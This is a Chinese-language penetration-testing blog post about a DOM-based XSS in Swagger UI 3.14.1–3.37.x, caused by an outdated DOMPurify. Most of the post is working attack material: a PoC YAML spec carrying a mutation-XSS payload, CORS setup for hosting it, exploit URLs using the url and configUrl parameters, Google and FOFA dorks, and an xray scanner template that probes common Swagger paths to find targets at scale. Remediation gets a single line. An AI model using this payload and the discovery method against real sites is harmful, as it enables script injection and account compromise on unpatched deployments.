渗透技巧基于Swagger-UI的XSS

免责声明:

  本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

漏洞简述:

  swagger-ui是一个允许 API 交互和可视化的库,Swagger-UI有一个特性它允许您向 API 规范提供URL一个yaml或json文件(例如http://swagger-server/swagger-ui.html?url=https://your_api_spec/spec.yaml、http://swagger-server/swagger-ui.html?configUrl=https://your_api_spec/file.json),它将被获取并显示给用户。该漏洞产生的原因是swagger-ui使用了一个过时的库DomPurify(DOMPurify是一个开源的基于DOM的快速XSS净化工具。输入HTML元素,然后通过DOM解析递归元素节点,进行净化,输出安全的HTML。),结合库的特性允许获得由查询参数控制的DOM型XSS。

受影响的版本:

  • Swagger UI versions affected with the XSS: >=3.14.1 < 3.38.0

漏洞实现

具体分析过程可以看原文

POC

swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' οnerrοr='alert(document.head)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

复现的时候踩了个坑
如果提示这个错误是因为无法跨域导致的,把Access-Control-Allow-Origin设置为*即可。
has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.
在这里插入图片描述
我这里使用的是apache设置配置文件httpd.conf,最后一行添加即可

<IfModule mod_headers.c>

    Header set Access-Control-Allow-Origin: "*"
    
    Header set Access-Control-Allow-Methods: "GET,POST,PUT,DELETE,OPTIONS"
    
    Header set Access-Control-Allow-Headers: "Content-Type"

</IfModule>

yaml文件配置

swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' οnerrοr='alert(document.head)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

json文件配置

{
    "url": "http://IP/test.yaml",
    "urls": [
        {
            "url": "http://IP/test.yaml",
            "name": "Foo"
        }
    ]
}

漏洞利用

  • http://attack-ip/swagger-ui.html?url=http://self-ip/test.yaml
  • http://attack-ip/swagger-ui.html?configUrl=http://self-ip/test.json

在这里插入图片描述

如何大规模找到 Swagger UI

Google

搜索:intext:"Swagger UI" intitle:"Swagger UI" site:yourarget.com
在这里插入图片描述

FOFA

语句:title="Swagger UI"
在这里插入图片描述

XRAY

也可以改一改直接扫可以执行XSS的,这是之前写的懒得改了。

name: poc-yaml-swagger_ui
manual: true
transport: http
rules:
    r0:
        request:
            method: GET
            path: /swagger/index.html
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r1:
        request:
            method: GET
            path: /swagger-ui.html
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r2:
        request:
            method: GET
            path: /v2/api-docs
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r3:
        request:
            method: GET
            path: /api-doc
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r4:
        request:
            method: GET
            path: /index.html
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r5:
        request:
            method: GET
            path: /v2/swagger.json
        expression: |
            response.status==200 && response.body.bcontains(b"{\"swagger\":\"2.0\"") || response.body.bcontains(b"{\"openapi\":\"3.0.1\"")
    r6:
        request:
            method: GET
            path: /v1/swagger.json
        expression: |
            response.status==200 && response.body.bcontains(b"{\"swagger\":\"2.0\"") || response.body.bcontains(b"{\"openapi\":\"3.0.1\"")
    r7:
        request:
            method: GET
            path: /api/swagger.json
        expression: |
            response.status==200 && response.body.bcontains(b"{\"swagger\":\"2.0\"") || response.body.bcontains(b"{\"openapi\":\"3.0.1\"")
    r8:
        request:
            method: GET
            path: /swagger/ui/index
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r9:
        request:
            method: GET
            path: /api/swagger-ui.html
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r10:
        request:
            method: GET
            path: /swagger/swagger-ui.html
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r11:
        request:
            method: GET
            path: /actuator/swagger-ui.html
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
    r12:
        request:
            method: GET
            path: /swagger/v1/swagger.json
        expression: |
            response.status==200 && response.body.bcontains(b"swagger-ui/css") || response.body.bcontains(b"swagger-ui.css") || response.body.bcontains(b"swagger-ui-")
expression: |
    r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() || r10() || r11() || r12()
detail:
    author: zhibing
    links: 
        - https://github.com/zhibx
    description: swagger_ui

在这里插入图片描述
使用抖音扫一扫关注我,带你学习网安知识,渗透实战,红队技巧。
在这里插入图片描述

修复

1.升级Swagger-UI。

  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值